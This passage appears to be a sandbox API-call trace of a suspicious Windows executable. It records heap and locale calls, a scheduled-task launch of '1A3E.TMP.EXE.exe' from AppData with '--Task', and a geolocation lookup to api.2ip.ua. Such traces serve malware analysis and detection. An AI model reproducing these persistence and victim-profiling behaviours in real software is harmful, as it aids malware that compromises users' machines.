RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2df258 [0117.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x2df258, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0117.886] GetLastError () returned 0x0 [0117.886] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1510) returned 0x84 [0117.886] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1510, Size=0x88) returned 0x2e1510 [0117.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0117.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db2b0 [0117.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x2db2b0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0117.886] GetLastError () returned 0x0 [0117.886] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1510) returned 0x88 [0117.886] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1510, Size=0x8c) returned 0x2e1510 [0117.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0117.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12) returned 0x2e14b8 [0117.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2e14b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0117.887] GetLastError () returned 0x0 [0117.887] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1510) returned 0x8c [0117.887] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1510, Size=0x90) returned 0x2e1510 [0117.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0117.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e15a8 [0117.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x2e15a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0117.887] GetLastError () returned 0x0 [0117.887] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1510) returned 0x90 [0117.887] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1510, Size=0x94) returned 0x2e15c8 [0117.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0117.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x46) returned 0x2d6d40 [0117.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x2d6d40, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0117.887] GetLastError () returned 0x0 [0117.887] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e15c8) returned 0x94 [0117.887] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e15c8, Size=0x98) returned 0x2e15c8 [0117.887] GetLastError () returned 0x0 [0117.950] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0f88) returned 0x80 [0117.951] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0f88) returned 0x80 [0117.951] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0f88) returned 0x80 [0117.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x2e1668 [0118.006] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0f88) returned 0x80 [0118.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2de7b0 [0118.007] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0f88) returned 0x80 [0118.007] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0f88) returned 0x80 [0118.007] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0f88) returned 0x80 [0118.077] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0f88) returned 0x80 [0118.086] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0118.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2d5c68 [0118.255] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) Thread: id = 36 os_tid = 0xa30 Thread: id = 37 os_tid = 0xa34 Thread: id = 38 os_tid = 0xb8c Thread: id = 39 os_tid = 0xa74 Thread: id = 40 os_tid = 0x83c Thread: id = 41 os_tid = 0xa78 Thread: id = 42 os_tid = 0xa84 Thread: id = 43 os_tid = 0xa80 Process: id = "6" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x51c8c000" os_pid = "0xa88" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {C26F051C-F71C-48F4-ABFA-75230DDBBDAB} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0xa8c Thread: id = 46 os_tid = 0x3a4 Thread: id = 47 os_tid = 0x644 Thread: id = 48 os_tid = 0xa44 Thread: id = 49 os_tid = 0xb9c Thread: id = 50 os_tid = 0xb98 Thread: id = 51 os_tid = 0xa6c Process: id = "7" image_name = "1a3e.tmp.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1a3e.tmp.exe.exe" page_root = "0x52a36000" os_pid = "0x3b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xa88" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 85 os_tid = 0xbfc [0127.612] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xe90bbe80, dwHighDateTime=0x1d5ff3b)) [0127.612] GetCurrentProcessId () returned 0x3b4 [0127.612] GetCurrentThreadId () returned 0xbfc [0127.612] GetTickCount () returned 0x1152c10 [0127.612] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=24754229117) returned 1 [0127.686] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40768b)) [0127.686] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x270000 [0127.688] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.688] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0127.688] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0127.688] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0127.688] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0127.688] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.688] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0127.689] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.689] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0127.689] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.689] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0127.689] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.689] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0127.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.690] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0127.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.690] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0127.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.690] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0127.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.691] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0127.691] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x214) returned 0x2707d0 [0127.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.691] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0127.692] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0127.692] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0127.692] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0127.692] GetCurrentThreadId () returned 0xbfc [0127.692] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0127.692] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x800) returned 0x2709f0 [0127.692] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0127.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0127.692] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0127.693] SetHandleCount (uNumber=0x20) returned 0x20 [0127.693] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --Task" [0127.693] GetEnvironmentStringsW () returned 0x701f28* [0127.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xaca) returned 0x2711f8 [0127.693] FreeEnvironmentStringsW (penv=0x701f28) returned 1 [0127.693] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4aadc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1a3e.tmp.exe.exe")) returned 0x61 [0127.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xde) returned 0x271cd0 [0127.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x98) returned 0x271db8 [0127.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x3e) returned 0x271e58 [0127.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x6c) returned 0x271ea0 [0127.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x6e) returned 0x271f18 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x78) returned 0x271f90 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x62) returned 0x272010 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2e) returned 0x272080 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x2720b8 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28) returned 0x272108 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a) returned 0x272138 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4a) returned 0x272160 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x72) returned 0x2721b8 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x30) returned 0x272238 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2e) returned 0x272270 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c) returned 0x2722a8 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xd2) returned 0x2722d0 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x7c) returned 0x2723b0 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x36) returned 0x272438 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x3a) returned 0x272478 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x90) returned 0x2724c0 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x24) returned 0x272558 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x30) returned 0x272588 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x36) returned 0x2725c0 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x272600 [0127.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x52) returned 0x272650 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x3c) returned 0x2726b0 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x82) returned 0x2726f8 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2e) returned 0x272788 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1e) returned 0x2727c0 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2c) returned 0x2727e8 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x54) returned 0x272820 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x52) returned 0x272880 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2a) returned 0x2728e0 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x3c) returned 0x272918 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x54) returned 0x272960 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x24) returned 0x2729c0 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x30) returned 0x2729f0 [0127.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8c) returned 0x272a28 [0127.695] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2711f8 | out: hHeap=0x270000) returned 1 [0127.695] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0127.695] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0127.695] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0127.696] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x800) returned 0x2711f8 [0127.697] GetLastError () returned 0x0 [0127.697] SetLastError (dwErrCode=0x0) [0127.697] GetLastError () returned 0x0 [0127.697] SetLastError (dwErrCode=0x0) [0127.697] GetLastError () returned 0x0 [0127.697] SetLastError (dwErrCode=0x0) [0127.697] GetACP () returned 0x4e4 [0127.697] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x220) returned 0x271a00 [0127.697] GetLastError () returned 0x0 [0127.697] SetLastError (dwErrCode=0x0) [0127.697] IsValidCodePage (CodePage=0x4e4) returned 1 [0127.697] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0127.697] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0127.697] GetLastError () returned 0x0 [0127.697] SetLastError (dwErrCode=0x0) [0127.697] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0127.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0127.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0127.697] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0127.697] GetLastError () returned 0x0 [0127.698] SetLastError (dwErrCode=0x0) [0127.698] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0127.698] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0127.698] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㝪⨛@Ā") returned 256 [0127.698] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㝪⨛@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0127.698] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㝪⨛@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0127.698] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 